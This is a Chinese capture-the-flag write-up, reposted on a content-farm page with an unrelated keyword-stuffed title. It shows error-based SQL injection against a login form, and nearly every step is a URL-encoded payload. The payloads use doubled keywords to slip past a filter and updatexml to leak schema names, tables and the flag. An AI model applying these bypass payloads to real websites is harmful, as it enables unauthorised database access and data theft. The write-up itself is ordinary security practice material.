微信运营网站建设销售网站开发的背景
web/
2025/10/6 18:55:26/
文章来源:
微信运营网站建设,销售网站开发的背景,做游乐设施模型的网站,百度竞价排名广告#做题方法#
进去之后做了简单的注入发现有错误回显#xff0c;就进行注入发现过滤了sql语
后面进行了双写and
payload#xff1a;
?usernameadmin%27%20aandnd%20updatexml(1,concat(0x7e,dAtabase(),0x7e,version()),1)%20--passwordadmi 接下来又
?usernameadm…#做题方法#
进去之后做了简单的注入发现有错误回显就进行注入发现过滤了sql语
后面进行了双写and
payload
?usernameadmin%27%20aandnd%20updatexml(1,concat(0x7e,dAtabase(),0x7e,version()),1)%20--passwordadmi 接下来又
?usernameadmin%27%20aandnd%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%27geek%27)),1)%20--passwordadmi
Error!
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near infmation_schema.tables table_schemageek)),1) -- and passwordadmi at line 1 过滤select和from和where这种关键性的sql语
p?usernameadmin%27%20aandnd%20updatexml(1,concat(0x7e,(selselectect%20group_concat(table_name)%20frfromom%20information_schema.tables%20whwhereere%20table_schemadatAbase())),1)%20--passwordadmin 过滤了or加上多加个or
?usernameadmin%27%20aandnd%20updatexml(1,concat(0x7e,(selselectect%20group_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schemadatAbase())),1)%20--passwordadmin 感觉不在这个库里面原因做过之前题好像是在ctf库里的
于是重新爆库名
p?usernameadmin%27%20aandnd%20updatexml(1,concat(0x7e,(selselectect%20group_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata)),1)%20--passwordadmi
ok!可以但是只能显示部分
于是加mid
usernameadmin%27%20aandnd%20updatexml(1,concat(0x7e,mid((selselectect%20group_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata),30,31)),1)%20--passwordadmin 肯定是mid过滤了
?usernameadmin%27%20aandnd%20updatexml(1,concat(0x7e,mmidid((selselectect%20group_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata),30,31)),1)%20--passwordadmi 好了在ctf里
admin%27%20aandnd%20updatexml(1,concat(0x7e,(selselectect%20group_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schemactf)),1)%20--passwordadmin usernameadmin%27%20aandnd%20updatexml(1,concat(0x7e,(selselectect%20group_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_name%27Flag%27)),1)%20--passwordadmin
还是flag于是
usernameadmin%27%20aandnd%20updatexml(1,concat(0x7e,(selselectect%20group_concat(flag)%20frfromom%20ctf.Flag)),1)%20--passwordadmin
flag{146e0e64-3add-4fab-aa69-bb usernameadmin%27%20aandnd%20updatexml(1,concat(0x7e,mmidid((selselectect%20group_concat(flag)%20frfromom%20ctf.Flag),30,31)),1)%20--passwordadmin
错误注入是出来32位回显的我们使用的是3031所以把前面bb去掉组合在一起就行了
~bb34cf3e6b1b} flag{146e0e64-3add-4fab-aa69-bb34cf3e6b1b}
最后我试了一下union也可以出来也是双写
username1%27%20ununionion%20selselectect%201,2,group_concat(flag)%20frfromom%20ctf.Flag%20--passwordadmin
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/88062.shtml
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!